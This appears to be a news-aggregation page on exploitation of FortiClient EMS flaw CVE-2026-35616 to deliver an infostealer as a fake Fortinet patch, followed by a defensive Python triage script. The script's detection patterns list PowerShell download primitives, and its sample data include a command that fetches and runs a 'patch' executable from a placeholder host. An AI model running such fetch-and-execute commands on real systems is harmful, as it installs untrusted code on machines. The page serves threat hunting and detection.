Attackers are exploiting a critical flaw in Fortinet's FortiClient Endpoint Management Server (EMS) to push malware to the endpoints it manages. The issue, CVE-2026-35616, is a remote code execution bug in FortiClient EMS that can be triggered without authentication via crafted requests; Fortinet patched it in April after warning it had already been exploited as a zero-day, and Arctic Wolf now reports fresh attacks that abuse EMS scripting workflows to deploy the EKZ Infostealer disguised as a Fortinet patch.
Why it matters: Because EMS is trusted to run scripts on every endpoint it manages, a compromised server becomes a distribution channel for malware, putting passwords, browser cookies and other sensitive data on those endpoints at risk. Organizations running FortiClient EMS should patch immediately, review EMS policies and remote access profiles for unexpected changes, hunt for suspicious PowerShell/script activity on managed endpoints, and investigate whether fake update jobs were pushed to them.
Bill Toulas
2026.05.28
99% relevant
This article covers the same underlying event and adds specific tradecraft from Arctic Wolf: attackers abused FortiClient EMS endpoint APIs and VPN scripting workflows to deliver the EKZ infostealer, used fortitray.exe and PowerShell to fetch a fake Fortinet update, and left detectable log artifacts such as 'Certificate not found in request header'.
Ionut Arghire
2026.05.28
100% relevant
This article establishes a distinct story by adding concrete post-patch exploitation details for FortiClient EMS CVE-2026-35616, including the malware payload, delivery method through EMS-managed VPN scripting, and the risk of compromise spreading to all managed endpoints.
Arctic Wolf Labs
2026.05.27
97% relevant
This source directly updates the same event by naming the payload as EKZ Infostealer, describing how it was disguised as a Fortinet patch, explaining abuse of EMS policy and remote access profile changes to run malicious PowerShell across managed endpoints, and providing detection details including EMS log artifacts and Tor-linked follow-on activity.
Arctic Wolf Labs
2026.05.27
99% relevant
This directly updates the same event by adding victim-observed tradecraft: attackers exploited CVE-2026-35616 in FortiClient EMS, modified EMS configuration, and delivered a fake Fortinet patch that installed the EKZ Infostealer on managed endpoints via PowerShell. It also adds detection clues from EMS logs and notes follow-on activity from Tor exit nodes.
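The hunting guidance in the summary (patch, look for suspicious PowerShell activity, check for fake update jobs) and the detection clues summarized from the Arctic Wolf reports above (the 'Certificate not found in request header' EMS log artifact, fortitray.exe launching PowerShell to fetch a fake Fortinet update) can be turned into a first-pass triage script. The following is an added example written for this page, not Fortinet or Arctic Wolf code. The EMS log line layout, the process-event fields, the fortitray.exe path, the list of PowerShell download primitives, the lure-string pattern and all sample records are constructed assumptions for illustration, not Fortinet-documented formats or published indicators.

```python
"""Triage helper for post-patch CVE-2026-35616 follow-on activity on FortiClient EMS hosts.

Added example for this page, not Fortinet or Arctic Wolf code. Log layouts, paths
and sample records below are constructed assumptions, not documented formats.
"""
import re
from dataclasses import dataclass

# Artifact string reported in the Arctic Wolf write-up summarized on this page.
EMS_ARTIFACT = "Certificate not found in request header"

# Download primitives an operator would look for in a PowerShell child of
# fortitray.exe. Assumption: a generic hunting list, not a Fortinet-supplied IOC set.
DOWNLOAD_PATTERNS = re.compile(
    r"(Invoke-WebRequest|\biwr\b|Invoke-RestMethod|\birm\b|DownloadFile|"
    r"DownloadString|Start-BitsTransfer|curl\.exe|certutil.*-urlcache)",
    re.IGNORECASE,
)
ENCODED_FLAG = re.compile(r"-(e|ec|enc|encodedcommand)\s+\S+", re.IGNORECASE)
POWERSHELL = re.compile(r"(?:^|\\)(powershell|pwsh)\.exe$", re.IGNORECASE)
# Assumption: the lure is named like a Fortinet patch/update, as the reports describe.
LURE = re.compile(r"forti\w*(patch|update|hotfix)", re.IGNORECASE)
IPV4 = re.compile(r"\b(\d{1,3}(?:\.\d{1,3}){3})\b")


@dataclass
class ProcEvent:
    """Process-creation record as exported from Sysmon ID 1 / Security 4688 (fields assumed)."""
    host: str
    parent_image: str
    image: str
    cmdline: str


def find_ems_artifacts(lines):
    """Return (line, source_ip) for EMS log lines carrying the reported artifact."""
    hits = []
    for line in lines:
        if EMS_ARTIFACT in line:
            m = IPV4.search(line)
            hits.append((line.strip(), m.group(1) if m else None))
    return hits


def score_proc_event(ev):
    """List the reasons a PowerShell process-creation event looks like the EMS-abuse chain."""
    reasons = []
    if not POWERSHELL.search(ev.image):
        return reasons
    if ev.parent_image.lower().endswith("fortitray.exe"):
        reasons.append("powershell spawned by fortitray.exe")
    if DOWNLOAD_PATTERNS.search(ev.cmdline):
        reasons.append("download primitive in command line")
    if ENCODED_FLAG.search(ev.cmdline):
        reasons.append("encoded command")
    if LURE.search(ev.cmdline):
        reasons.append("Fortinet patch/update lure string")
    return reasons


def is_suspicious(ev):
    """fortitray.exe -> PowerShell is a legitimate EMS scripting path, so require a
    second indicator (download, encoding or lure name) before flagging the host."""
    reasons = score_proc_event(ev)
    return "powershell spawned by fortitray.exe" in reasons and len(reasons) >= 2


def triage(ems_lines, events):
    """Combine server-side artifacts and endpoint-side process events into one report."""
    return {
        "ems_artifacts": find_ems_artifacts(ems_lines),
        "suspicious_hosts": sorted({ev.host for ev in events if is_suspicious(ev)}),
    }


# Constructed sample data (format assumed; 203.0.113.0/24 and example.invalid are reserved).
EMS_LOG = [
    "2026-05-20T03:14:07Z INFO apiserver: request from 203.0.113.45: "
    "Certificate not found in request header",
    "2026-05-20T03:14:09Z INFO apiserver: policy 'Default' updated by admin",
    "2026-05-20T03:15:00Z WARN vpn: remote access profile 'Corp-VPN' modified",
]
TRAY = r"C:\Program Files\Fortinet\FortiClient\fortitray.exe"  # path assumed
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    ProcEvent("ws-017", TRAY, PS,
              'powershell.exe -NoProfile -ExecutionPolicy Bypass -c "Invoke-WebRequest '
              'https://update.example.invalid/FortiClientPatch.exe -OutFile '
              '$env:TEMP\\FortiClientPatch.exe; Start-Process $env:TEMP\\FortiClientPatch.exe"'),
    # Legitimate-looking scripted VPN workflow: parent match alone is not enough.
    ProcEvent("ws-022", TRAY, PS, r"powershell.exe -NoProfile -File C:\Scripts\vpn-routes.ps1"),
    # Download from a non-EMS parent: outside this hunt's scope.
    ProcEvent("ws-031", r"C:\Windows\explorer.exe", PS,
              "powershell.exe Invoke-WebRequest https://intranet.example.invalid/tool.zip -OutFile t.zip"),
]

if __name__ == "__main__":
    print(triage(EMS_LOG, SAMPLE_EVENTS))
```

Treat a hit as a lead, not a verdict: fortitray.exe launching PowerShell is how the EMS scripting feature normally works, which is why the script demands a download primitive, an encoded command or a patch-style lure name alongside the parent relationship. Corroborate flagged hosts against the EMS policy and remote access profile change history and the Tor exit node traffic mentioned in the reports.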